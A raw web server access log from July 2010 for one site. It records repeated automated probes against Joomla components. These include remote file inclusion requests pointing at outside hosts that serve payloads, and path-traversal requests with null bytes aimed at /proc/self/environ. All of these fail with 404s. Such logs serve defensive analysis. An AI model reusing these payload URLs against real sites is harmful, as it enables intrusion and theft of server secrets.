66.71.245.122 - - [27/Jul/2010:13:19:06 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:13:20:40 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
64.207.204.37 - - [27/Jul/2010:13:20:40 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:20:55 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:20:55 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:13:22:46 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
74.55.73.74 - - [27/Jul/2010:13:22:46 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
74.55.73.74 - - [27/Jul/2010:13:23:30 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
74.55.73.74 - - [27/Jul/2010:13:23:31 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
74.55.73.74 - - [27/Jul/2010:13:23:55 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
74.55.73.74 - - [27/Jul/2010:13:23:56 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:24:10 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:24:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:13:26:26 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
64.207.204.37 - - [27/Jul/2010:13:26:26 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
64.207.204.37 - - [27/Jul/2010:13:26:26 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
64.207.204.37 - - [27/Jul/2010:13:26:26 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
64.207.204.37 - - [27/Jul/2010:13:26:34 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:13:26:35 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:13:26:38 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:13:26:49 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:13:27:14 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:13:27:58 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:34:04 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:34:12 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:36:29 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:36:31 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:36:54 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:36:54 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:37:08 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:37:16 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
76.13.114.107 - - [27/Jul/2010:13:40:49 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:42:20 -0700] "GET /logs/access.log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:42:20 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:42:20 -0700] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:42:24 -0700] "GET /logs/access.log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:42:25 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:42:25 -0700] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
76.13.123.194 - - [27/Jul/2010:13:43:55 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
74.55.73.74 - - [27/Jul/2010:13:45:45 -0700] "GET /logs/access.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:13:45:50 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:13:45:50 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:13:47:23 -0700] "GET /logs/access.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:13:47:23 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:13:47:23 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:13:48:19 -0700] "GET /logs/access.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:13:48:20 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:13:48:20 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:13:49:19 -0700] "GET /logs/access.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:13:49:19 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:13:49:19 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:13:49:30 -0700] "GET /logs/access.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:13:49:30 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:13:49:30 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:13:51:16 -0700] "GET /logs/access.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:13:51:16 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:13:51:16 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
66.163.171.207 - - [27/Jul/2010:14:05:26 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
58.248.142.109 - - [27/Jul/2010:14:08:21 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
58.248.143.12 - - [27/Jul/2010:14:11:49 -0700] "GET /logs/access_100614.log HTTP/1.1" 200 93466 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
64.207.204.37 - - [27/Jul/2010:14:21:05 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
64.207.204.37 - - [27/Jul/2010:14:21:05 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
74.55.73.74 - - [27/Jul/2010:14:21:06 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
74.55.73.74 - - [27/Jul/2010:14:21:07 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
64.207.204.37 - - [27/Jul/2010:14:23:17 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:14:23:42 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:14:33:43 -0700] "GET /logs/access.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:14:33:43 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:14:33:43 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:14:33:54 -0700] "GET /logs/access.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:14:33:54 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:14:33:54 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
204.232.210.39 - - [27/Jul/2010:14:33:57 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.redneckmba.com"
204.232.210.39 - - [27/Jul/2010:14:33:58 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.redneckmba.com"
204.232.210.39 - - [27/Jul/2010:14:33:58 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.redneckmba.com"
200.175.239.226 - - [27/Jul/2010:14:38:03 -0700] "GET /index.php?option=com_fabrik&mosConfig.absolute.path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.175.239.226 - - [27/Jul/2010:14:38:03 -0700] "GET /logs/access.log//index.php?option=com_fabrik&mosConfig.absolute.path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.175.239.226 - - [27/Jul/2010:14:38:03 -0700] "GET /logs//index.php?option=com_fabrik&mosConfig.absolute.path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:14:39:59 -0700] "GET /logs/access.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:14:39:59 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:14:40:00 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:14:41:47 -0700] "GET /logs/access.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:14:41:48 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:14:41:48 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
114.45.61.127 - - [27/Jul/2010:14:44:33 -0700] "GET /logs/access_100614.log HTTP/1.1" 200 93466 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
76.13.114.107 - - [27/Jul/2010:14:47:56 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
69.175.105.186 - - [27/Jul/2010:14:49:00 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=/usr/local/apache/bin/httpd? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
69.175.105.186 - - [27/Jul/2010:14:49:00 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=/usr/local/apache/bin/httpd? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
69.175.105.186 - - [27/Jul/2010:14:49:17 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=/usr/local/apache/bin/httpd? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [27/Jul/2010:14:53:58 -0700] "GET /logs/access_100614.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.207.204.37 - - [27/Jul/2010:14:55:29 -0700] "GET /logs/access_100614.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
69.175.105.186 - - [27/Jul/2010:14:57:42 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=/usr/local/apache/bin/httpd? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
69.175.105.186 - - [27/Jul/2010:14:57:43 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=/usr/local/apache/bin/httpd? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
69.175.105.186 - - [27/Jul/2010:14:57:43 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=/usr/local/apache/bin/httpd? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
212.174.28.46 - - [27/Jul/2010:15:00:15 -0700] "GET /logs//index.php?option=com_fabrik&mosConfig.absolute.path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
212.174.28.46 - - [27/Jul/2010:15:00:15 -0700] "GET /logs/access.log//index.php?option=com_fabrik&mosConfig.absolute.path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
212.174.28.46 - - [27/Jul/2010:15:00:18 -0700] "GET /index.php?option=com_fabrik&mosConfig.absolute.path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.31.19.246 - - [27/Jul/2010:15:17:54 -0700] "GET /logs/access_100614.log HTTP/1.1" 200 93466 "http://www.google.as/url?sa=t&source=web&cd=100&ved=0CDQQFjAJOFo&url=http%3A%2F%2Fredneckmba.com%2Flogs%2Faccess_100614.log&rct=j&q=com_joomla-visites&ei=6FpPTNTIDIaD4Qarz_DyBw&usg=AFQjCNHU42SjMp0-01Gn2jrexzLiT4ggsw" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" "redneckmba.com"
69.175.105.186 - - [27/Jul/2010:15:18:36 -0700] "GET /logs/access_100614.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=/usr/local/apache/bin/httpd? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
